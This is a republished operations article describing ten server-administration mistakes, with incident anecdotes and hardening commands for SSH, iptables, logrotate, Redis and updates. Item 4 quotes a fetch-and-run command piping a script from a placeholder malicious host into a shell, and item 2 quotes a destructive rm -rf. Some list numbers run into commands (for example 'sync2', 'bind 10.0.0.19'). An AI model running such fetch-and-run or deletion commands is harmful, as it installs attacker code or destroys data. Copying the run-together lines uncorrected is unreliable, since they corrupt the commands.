10 Server Mistakes That Can End Your Career – Real Disaster Cases & Prevention
This article compiles ten real-world server‑operation disasters, explains the technical fallout of each forbidden action, and provides concrete command‑line remedies and best‑practice safeguards to help engineers avoid career‑ending mistakes.
1. Power‑off the server directly
Case: An operations engineer cut power, causing loss of millions of transaction records.
Technical impact:
File system corruption (requires fsck repair)
Unsaved memory data lost
RAID controller cache data lost
Correct procedure:
shutdown -h now
sync; sync; sync2. Run tests directly in production
Real incident: A developer executed rm -rf ./tmp/* on a live system; the tmp directory was a symlink to the root, wiping critical files.
Consequences:
Complete service outage
Data recovery took 72 hours
3. Arbitrarily modify firewall rules
Disaster: An operator disabled iptables to save time, allowing ransomware to infiltrate the server.
Security rule: Never use iptables -F to flush all rules; always back up before changes.
iptables-save > /backup/iptables_$(date +%F).rules4. Execute unknown scripts as root
Compromise: A third‑party “optimization” script actually ran curl http://malicious.com | sh, installing a cryptominer.
Protection:
Audit script content, especially any wget / curl download actions
Run scripts with a non‑privileged user
sudo -u appuser ./deploy.sh5. Operate the database without backups
Classic tragedy: A DBA ran ALTER TABLE without a backup, corrupting the table structure.
Rescue workflow:
CREATE TABLE backup_table LIKE original_table;
INSERT INTO backup_table SELECT * FROM original_table;6. Allow password‑based SSH login
Attack: Weak passwords were brute‑forced, granting attackers root access and enabling crypto‑mining.
Hardening steps:
# Disable password login
sed -i 's/PasswordAuthentication yes/PasswordAuthentication no/g' /etc/ssh/sshd_config
# Enable key‑based login
ssh-copy-id -i ~/.ssh/id_rsa.pub user@server7. Let log files grow unchecked
Disk disaster: /var/log filled up, causing a Kafka cluster to crash.
Remediation:
# Configure daily log rotation
vim /etc/logrotate.d/nginx
/var/log/nginx/*.log {
daily
rotate 30
compress
missingok
notifempty
}8. Expose services on default ports
Ingress vector: Redis on port 6379 was publicly reachable and was mass‑attacked, wiping data.
Protection:
# Change default port
vim /etc/redis.conf
port 6380
# Bind to internal IP only
bind 10.0.0.19. Deploy changes without monitoring
Gray‑scale disaster: An unmonitored midnight upgrade caused a service avalanche that went unnoticed.
Golden rule: Continuously monitor key metrics during changes.
# Real‑time change monitoring
watch -n 1 "netstat -ant | grep ESTABLISHED | wc -l"
# Baseline thresholds
- CPU usage spike >50%
- Memory consumption continuously rising
- Disk I/O latency >100ms10. Fail to apply security updates
Vulnerability explosion: An unpatched Log4j flaw was exploited, encrypting all data.
Update policy:
# Secure update process
yum update --security -y
# Reboot after kernel upgrade
rebootOverall, about 80 % of operations incidents stem from human error; treating every command as a potential bomb‑defusal step can dramatically reduce downtime and data loss.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
dbaplus Community
Enterprise-level professional community for Database, BigData, and AIOps. Daily original articles, weekly online tech talks, monthly offline salons, and quarterly XCOPS&DAMS conferences—delivered by industry experts.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
